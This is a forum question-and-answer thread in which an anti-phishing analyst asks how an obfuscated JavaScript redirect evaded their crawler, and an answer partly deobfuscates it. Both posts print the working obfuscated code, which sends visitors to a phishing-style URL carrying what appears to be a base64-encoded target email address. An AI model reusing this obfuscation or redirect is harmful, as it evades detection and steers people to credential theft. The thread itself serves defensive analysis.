Figuring Phishing redirection hidden in web source code

Question

I'm working at an anti Phishing company and I've stumbled a case which managed to evade our JCrawler, I tried to understand the code and what the attacker did here to stay undetectable and couldn't figure it out got really confused.

How can I avoid missing detection for sites such as this:

<!DOCTYPE html>
<html>
<title>Loading...</title>
<link rel="shortcut icon" href="favicon_a_eupayfgghqiai7k9sol6lg2.ico" />
    <body>
        <script>
            var _0x117d=['4gSLXgI','2815VEHvFQ','14927VMrRFI','180751tIiKtp','11OWCNOZ','264810PhaCGI','49788ekTpju','https://42m6lvv4qywlq97qagwvfhnvm.monakasatelyoum.com/69bd90c1d7eb4aea978f3b70b4c2ba01//-5D8nkf4Z8xowFj3dQseoEAXkZbuLZbhvqckbUQIUGexERLdh7SGIiPu2dFknWuLaNuPLXHFNrKVsxBbwZml4cYEzxyj9bgHiJ5Qw485IUD2zCeI7l64XLrI9g7ChMk1U5MYIuWxbXIcqzk9RWPV5iVrChffikJy47gqSntD7qDhUBRRu33pHKYqGcVGD3Yv7YVvoEiGy?data=c2hhbHNhbGxAYmFjYXJkaS5jb20=','53294CAvUWH','289945bcwcUH','68GhmPuA','replace','15KaunFV'];
            var _0x3d5f=function(_0x1853ca,_0x41286d){_0x1853ca=_0x1853ca-0x108;
                                                        var _0x117ddf=_0x117d[_0x1853ca];
                                                            return _0x117ddf;};
            var _0x37e4a6=_0x3d5f;
            (function(_0x5bb9bd,_0x286286){var _0xe278b9=_0x3d5f;
                                           while(!![])
                                                {try{var _0x2d8884=parseInt(_0xe278b9(0x10c))*-parseInt(_0xe278b9(0x111))+parseInt(_0xe278b9(0x10d))+-parseInt(_0xe278b9(0x112))*parseInt(_0xe278b9(0x10e))+-parseInt(_0xe278b9(0x109))+parseInt(_0xe278b9(0x113))*parseInt(_0xe278b9(0x110))+-parseInt(_0xe278b9(0x114))+parseInt(_0xe278b9(0x108))*parseInt(_0xe278b9(0x10a));
                                                     if(_0x2d8884===_0x286286)
                                                         break;
                                                     else _0x5bb9bd['push'](_0x5bb9bd['shift']());}
                                                 catch(_0x54c267){_0x5bb9bd['push'](_0x5bb9bd['shift']());}}}(_0x117d,0x339a1),location[_0x37e4a6(0x10f)](_0x37e4a6(0x10b)));      
</script>
   </body>
</html> 

Answer 1

This seems something like JS obfuscator, right?

'use strict';
var _0x117d = ["4gSLXgI", "2815VEHvFQ", "14927VMrRFI", "180751tIiKtp", "11OWCNOZ", "264810PhaCGI", "49788ekTpju", "https://42m6lvv4qywlq97qagwvfhnvm.monakasatelyoum.com/69bd90c1d7eb4aea978f3b70b4c2ba01//-5D8nkf4Z8xowFj3dQseoEAXkZbuLZbhvqckbUQIUGexERLdh7SGIiPu2dFknWuLaNuPLXHFNrKVsxBbwZml4cYEzxyj9bgHiJ5Qw485IUD2zCeI7l64XLrI9g7ChMk1U5MYIuWxbXIcqzk9RWPV5iVrChffikJy47gqSntD7qDhUBRRu33pHKYqGcVGD3Yv7YVvoEiGy?data=c2hhbHNhbGxAYmFjYXJkaS5jb20=", "53294CAvUWH", "289945bcwcUH", "68GhmPuA", "replace", "15KaunFV"];
var _0x3d5f = function _getCompositionValue(key, value) {
key = key - 264;
var value = _0x117d[key];
return value;
};
var _0x37e4a6 = _0x3d5f;
(function(data, oldPassword) {
var toMonths = _0x3d5f;
for (; !![];) {
try {
var userPsd = parseInt(toMonths(268)) * -parseInt(toMonths(273)) + parseInt(toMonths(269)) + -parseInt(toMonths(274)) * parseInt(toMonths(270)) + -parseInt(toMonths(265)) + parseInt(toMonths(275)) * parseInt(toMonths(272)) + -parseInt(toMonths(276)) + parseInt(toMonths(264)) * parseInt(toMonths(266));
if (userPsd === oldPassword) {
break;
} else {
data["push"](data["shift"]());
}
} catch (_0x54c267) {
data["push"](data["shift"]());
}
}
})(_0x117d, 211361), location[_0x37e4a6(271)](_0x37e4a6(267));